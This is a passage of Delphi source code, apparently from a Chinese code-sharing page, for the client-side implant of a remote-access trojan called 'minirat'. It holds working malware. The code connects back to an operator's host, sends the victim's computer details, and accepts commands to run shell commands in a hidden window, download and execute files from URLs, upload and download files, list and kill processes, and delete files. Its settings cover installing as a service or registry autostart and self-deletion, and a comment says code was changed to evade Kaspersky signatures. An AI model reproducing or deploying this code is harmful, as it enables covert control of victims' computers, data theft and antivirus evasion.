📄
字号:
JBE @D5
ADD ECX,EDX
MOV AL,'0'
SUB ESI,EDX
JMP @z
@zloop: MOV [ESI+EDX],AL
@z: DEC EDX
JNZ @zloop
MOV [ESI],AL
@D5:
end;
function IntToHex(Value: Integer; Digits: Integer): string;
asm
CMP EDX, 32
JBE @A1
XOR EDX, EDX
@A1: PUSH ESI
MOV ESI, ESP
SUB ESP, 32
PUSH ECX
MOV ECX, 16
CALL CvtInt
MOV EDX, ESI
POP EAX
CALL System.@LStrFromPCharLen
ADD ESP, 32
POP ESI
end;
//列出进程 + 列出模块 (查看PID, 线程, 模块)
procedure ListProcess(dInt: Integer);
var
CB: DWord;
hMod_: HMODULE;
hMod: array[0..300] of HMODULE;
hProcess: THandle;
hModule: THandle;
hSnapShot: THandle;
ProcessName: array[0..300] of Char;
ModuleName: array[0..300] of Char;
ProcessEntry: TProcessEntry32;
Done: Boolean;
Temp: string;
Mods: Integer;
I: Word;
B: array[0..9] of Char;
begin
hSnapShot := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
ProcessEntry.dwSize := SizeOf(ProcessEntry);
Done := Process32First(hSnapShot, ProcessEntry);
while Done do
begin
hProcess := OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_READ, False,
ProcessEntry.th32ProcessID);
if (hProcess <> 0) then
begin
EnumProcessModules(hProcess, @hMod_, SizeOf(hMod_), CB);
GetModuleFileNameExA(hProcess, hMod_, ProcessName, SizeOf(ProcessName));
if (Pos('\', ProcessName) > 0) then
begin
Temp := IntToStr(C_PROCESSLIST) + ' ' +
IntToStr(ProcessEntry.cntThreads) + ' ' +
IntToStr(ProcessEntry.th32ProcessID) + ' ' +
IntToHex(ProcessEntry.th32ProcessID, 8) + ' ' +
ProcessName + #10;
Send(Serv.Sock, Temp[1], Length(Temp), 0);
if (Recv(Serv.Sock, B[0], SizeOf(B), 0) <= 0) then
begin
CloseHandle(hProcess);
CloseHandle(hSnapShot);
Exit;
end;
if (dInt = 1) then
begin
EnumProcessModules(hProcess, @hMod, SizeOf(hMod), CB);
Mods := CB div SizeOf(HMODULE);
Temp := '';
for I := 0 to Mods do
begin
GetModuleFilenameExA(hProcess, hMod[I], ModuleName,
SizeOf(ModuleName));
Temp := IntToStr(C_MODULELIST) + ' ' +
IntToStr(ProcessEntry.th32ProcessID) + ' ' +
ExtractFileName(ProcessName) + #1' ' +
ModuleName + #10;
Send(Serv.Sock, Temp[1], Length(Temp), 0);
if (Recv(Serv.Sock, B[0], SizeOf(B), 0) <= 0) then
begin
CloseHandle(hProcess);
CloseHandle(hSnapShot);
Exit;
end;
end;
end;
end;
CloseHandle(hProcess);
end;
Done := Process32Next(hSnapshot, ProcessEntry);
end;
CloseHandle(hSnapShot);
end;
procedure EndProcess(dPID: string);
var
ProcessHandle: THandle;
ReturnValue: Boolean;
Temp: string;
begin
ProcessHandle := OpenProcess(PROCESS_TERMINATE, BOOL(0), StrToInt(dPID));
ReturnValue := TerminateProcess(ProcessHandle, 0);
if (not ReturnValue) then
Temp := IntToStr(C_ENDPROCESS) + ' ' + dPID + ' 0'#10
else
Temp := IntToStr(C_ENDPROCESS) + ' ' + dPID + ' 1'#10;
Send(Serv.Sock, Temp[1], Length(Temp), 0);
end;
function RunDosInCap(DosApp: string): string;
const
ReadBuffer = 24000;
var
Security: TSecurityAttributes;
ReadPipe, WritePipe: THandle;
start: TStartUpInfo;
ProcessInfo: TProcessInformation;
Buffer: Pchar;
BytesRead, Apprunning: DWord;
begin
with Security do
begin
nlength := SizeOf(TSecurityAttributes);
binherithandle := true;
lpsecuritydescriptor := nil;
end;
if Createpipe(ReadPipe, WritePipe, @Security, 0) then
begin
Buffer := AllocMem(ReadBuffer + 1);
FillChar(Start, Sizeof(Start), #0);
start.cb := SizeOf(start);
start.hStdOutput := WritePipe;
start.hStdInput := ReadPipe;
start.dwFlags := STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;
start.wShowWindow := SW_HIDE;
if CreateProcess(nil, PChar(DosApp), @Security, @Security, true,
NORMAL_PRIORITY_CLASS, nil, nil, start, ProcessInfo) then
begin
repeat
Apprunning := WaitForSingleObject(ProcessInfo.hProcess, 100);
until (Apprunning <> WAIT_TIMEOUT);
repeat
BytesRead := 0;
ReadFile(ReadPipe, Buffer[0], ReadBuffer, BytesRead, nil);
Buffer[BytesRead] := #0;
OemToAnsi(Buffer, Buffer);
Result := Result + string(Buffer);
until (BytesRead < ReadBuffer);
end;
FreeMem(Buffer);
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
CloseHandle(ReadPipe);
CloseHandle(WritePipe);
end;
end;
procedure ReplaceStr(ReplaceWord, WithWord: string; var Text: string);
var
xPos: Integer;
begin
while Pos(ReplaceWord, Text) > 0 do
begin
xPos := Pos(ReplaceWord, Text);
Delete(Text, xPos, Length(ReplaceWord));
Insert(WithWord, Text, xPos);
end;
end;
//文件传递
procedure TServer.ReceiveData;
var
Buffer: array[0..1600] of Char;
Data: string;
Time: TTimeVal;
FDS: TFDSet;
D: Dword;
Len: Integer;
Port: Integer;
Temp: string;
Cmd: string;
Param: array[0..100] of string;
P: Integer;
FName: string;
begin
repeat
Time.tv_sec := 120;
Time.tv_usec := 0;
FD_ZERO(FDS);
FD_SET(Sock, FDS);
if Select(0, @FDS, nil, nil, @TIME) <= 0 then Break;
Len := Recv(Sock, Buffer, 1600, 0);
if (Len <= 0) then Break;
Data := string(Buffer);
ZeroMemory(@Buffer, SizeOf(Buffer));
while (Pos(#10, Data) > 0) do
begin
Temp := Copy(Data, 1, Pos(#10, Data) - 1);
Delete(Data, 1, Pos(#10, Data));
StripOutCmd(Temp, Cmd);
StripOutParam(Temp, Param);
case StrToInt(Cmd) of
C_DOWNLOAD:
begin
Temp := IntToStr(C_DOWNLOAD) + ' ' + ExecuteFileFromURL(Param[0],
Copy(Temp, Pos(Param[1], Temp), Length(Temp)));
Send(Sock, Temp[1], Length(Temp), 0);
Sleep(2000);
ExitProcess(0);
end;
C_UNINSTALL: Uninstall;
C_PASS:
if (Param[0] = '0') then CloseSocket(Sock);
C_GETFILE:
begin
Delete(Temp, 1, 2);
if (FileExists(Temp)) then
begin
FName := ExtractFileName(Temp);
repeat
P := Pos(#32, FName);
Delete(FName, P, 1);
Insert('_', FName, P);
until (Pos(#32, FName) = 0);
Port := ((Random(9) + 1) * 1000) + Random(500);
SendData(IntToStr(C_STARTTRANSFER) + ' 0 ' +
IntToStr(GetFileSize(Temp)) + ' ' + IntToStr(Port) + ' ' + FName +
#10);
Info.Name := Temp;
Info.Host := RemoteAddress(Sock);
Info.Port := Port;
CreateThread(nil, 0, @SendFile, @Info, 0, D);
end;
end;
C_PUTFILE:
begin
(* C_PUTFILE size NewName#1 OldName *)
Temp := Copy(Temp, Pos(Param[1], Temp), Length(Temp));
FName := Copy(Temp, Pos(#1, Temp) + 2, Length(Temp));
Temp := Copy(Temp, 1, Pos(#1, Temp) - 1);
Port := ((Random(9) + 1) * 1000) + Random(500);
SendData(IntToStr(C_STARTTRANSFER) + ' 1 ' + Param[0] + ' ' +
IntToStr(Port) + ' ' + FName + #10);
Info.Name := Temp;
Info.Host := RemoteAddress(Sock);
Info.Port := Port;
Info.Size := StrToInt(Param[0]);
CreateThread(nil, 0, @RecvFile, @Info, 0, D);
end;
C_INFOSYSTEM: SendData(GetInformation());
C_INFOSERVER: SendData(GetServerInfo());
C_INFONETWORK: SendData(GetNetworkInfo());
C_REQUESTDRIVE:
begin
SetLength(Temp, 300);
GetLogicalDriveStrings(300, pChar(Temp));
while (Pos(#0, Temp) > 0) do
begin
FName := IntToStr(C_REQUESTDRIVE) + ' ' + Copy(Temp, 1, Pos(#0,
Temp) - 1) + #10;
Temp := Copy(Temp, Pos(#0, Temp) + 1, Length(Temp));
Send(Sock, FName[1], Length(FName), 0);
FName := '';
end;
end;
C_REQUESTLIST:
begin
Temp := Copy(Temp, Pos(Param[0], Temp), Length(Temp));
GenerateList(Temp, 1);
GenerateList(Temp, 2);
LastDir := IntToStr(C_CURRENTPATH) + ' ' + Temp;
if LastDir <> '' then
if (LastDir[Length(LastDir)] <> '\') then
LastDir := LastDir + '\';
LastDir := LastDir + #10;
end;
C_CURRENTPATH: Send(Sock, LastDir[1], Length(LastDir), 0);
C_EXECUTE:
begin
Temp := Copy(Temp, Pos(Param[1], Temp), Length(Temp));
ShellExecute(0, 'open', pChar(Temp), nil, nil, StrToInt(Param[0]));
end;
C_DELETE:
begin
Temp := Copy(Temp, Pos(Param[0], Temp), Length(Temp));
DeleteFile(pChar(Temp));
end;
C_PROCESSLIST:
begin
ListProcess(StrToInt(Param[0]));
Temp := IntToStr(C_FINISH) + ' '#10;
Send(Sock, Temp[1], Length(Temp), 0);
end;
C_ENDPROCESS: EndProcess(Copy(Temp, 4, Length(Temp)));
C_REMOTECMD:
begin
Temp := IntToStr(C_REMOTECMD) + ' ' +
RunDosInCap(Copy(Temp, 4, Length(Temp)));
ReplaceStr(#10, #1, Temp);
Temp := Temp + #10;
Send(Sock, Temp[1], Length(Temp), 0);
end;
end;
end;
until 1 = 2;
CloseSocket(Sock);
end;
procedure TServer.SendData(Text: string);
var
dErr: Integer;
begin
dErr := Send(Sock, Text[1], Length(Text), 0);
if (dErr = 0) then Exit;
end;
function ComputerName: string;
var
CNameBuffer: PChar;
fl_loaded: Boolean;
CLen: ^DWord;
begin
GetMem(CNameBuffer,255);
New(CLen);
CLen^:= 255;
fl_loaded := GetComputerName(CNameBuffer,CLen^);
if fl_loaded then
Result := StrPas(CNameBuffer)
else
Result := 'Unkown';
FreeMem(CNameBuffer,255);
Dispose(CLen);
end;
procedure TServer.Connect;
begin
Password := PieZhi.dPass;
Host := ResolveIP(PieZhi.dDnsHost);
Port := 81; // StrToInt(PieZhi.dRemotePort);
WSAStartUP($0101, WSA); //加载winsock库
Close := False;
repeat
Sock := Socket(AF_INET, SOCK_STREAM, 0);
Addr.sin_family := AF_INET;
Addr.sin_port := hTons(Port);
Addr.sin_addr.S_addr := inet_Addr(pChar(Host));
if (Winsock.Connect(Sock, Addr, SizeOf(Addr)) = 0) then
begin
SendData('01 ' + password + #10);
SendData('02 ' + version + #10);
SendData('03 ' + getnet + #10);
SendData('20 ' + ComputerName + #10);
ReceiveData;
end;
Sleep(30000);
LastDir := '';
until (Close);
WSACleanUP();
end;
procedure ReadFileStr(dName: string; var Content: string);
var
FContents: file of Char;
FBuffer: array[1..1024] of Char;
rLen: LongInt;
FSize: LongInt;
begin
try
Content := '';
AssignFile(FContents, dName); // 访问正在使用的 文本文件
Reset(FContents);
FSize := FileSize(FContents);
while not EOF(FContents) do
begin
BlockRead(FContents, FBuffer, 1024, rLen); // 读记录
Content := Content + string(FBuffer);
end;
CloseFile(FContents);
if Length(Content) > FSize then
Content := Copy(Content, 1, FSize);
except
Exit;
end;
end;
//间单加密一下--------------
function EncryptText(Text: string): string;
var
I: Word;
C: Word;
begin
Result := '';
for I := 1 to Length(Text) do
begin
C := Ord(Text[I]);
Result := Result + Chr((C xor 12));
end;
end;
//读取所有配置信息 --------------
procedure ReadSettings;
var
I: Word;
Settings: string;
FileContent: string;
NewFileName: string;
begin
// NewFileName := ParamStr(0) + '_'; //生成文件名
// CopyFile(pChar(ParamStr(0)), pChar(NewFileName), False); //复制
ReadFileStr(ConFile, FileContent);
I := Length(FileContent);
Settings := '';
while (I > 0) and (FileContent[i] <> #00) do
begin
Settings := FileContent[i] + Settings;
Dec(I);
end;
if (Settings = '') then
begin
DeleteFile(pChar(NewFileName));
Uninstall;
end;
Settings := EncryptText(Settings);
pz^.Urlhttp := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //x
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dConType := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); ////连接类型; 0:主动连接,1:被动连接
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dDnsHost := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //100
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dLocalPort := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //被动连接端口
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dRemotePort := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //主动连接端口
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dPass := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //连接客码
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dGroup := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //上线组
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dRunAsSrv := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //以服务运行 1:以服务运行,2:注册自动启动
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dInsPath := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //安装路 0:<window> 1:<system> 2<templete>
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dInsFileName := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //安装文件名称
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dIsAutoDelMe := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //是否自己删除自己 0:不删除 1:删除自己
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dSrvView := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //服务说明
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dSrvName := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //服务名称
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dSrvText := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //服务描述
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dMainThread := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //Start.exe线程ID
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
strcopy(pz^.dhostProcess,PChar(Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))))); //缩主进程名
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
strcopy(pz^.dDllFile,PChar(Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))))); //缩主进程名
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dRegLM := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //注册在HKEY_LOCAL_MACHINE
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dRegCU := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //注册在HKEY_CURRENT_USER
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
pz^.dRegSH := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //注册为Shell Explorer
Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
// DeleteFile(pChar(NewFileName));
end;
//获取系统目录 --------------------
function GetDirectory(dInt: Integer): string;
var
S: array[0..255] of Char;
begin
case dInt of
0: GetWindowsDirectory(@S, 256);
1: GetSystemDirectory(@S, 256);
end;
Result := string(S) + '\';
end;
procedure miniratMain;
begin
asm //改成卡吧不能特征码
nop
nop
end;
Serv := TServer.Create;
while not (InternetGetConnectedState(nil, 0)) do
Sleep(5000);
Serv.Connect;
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -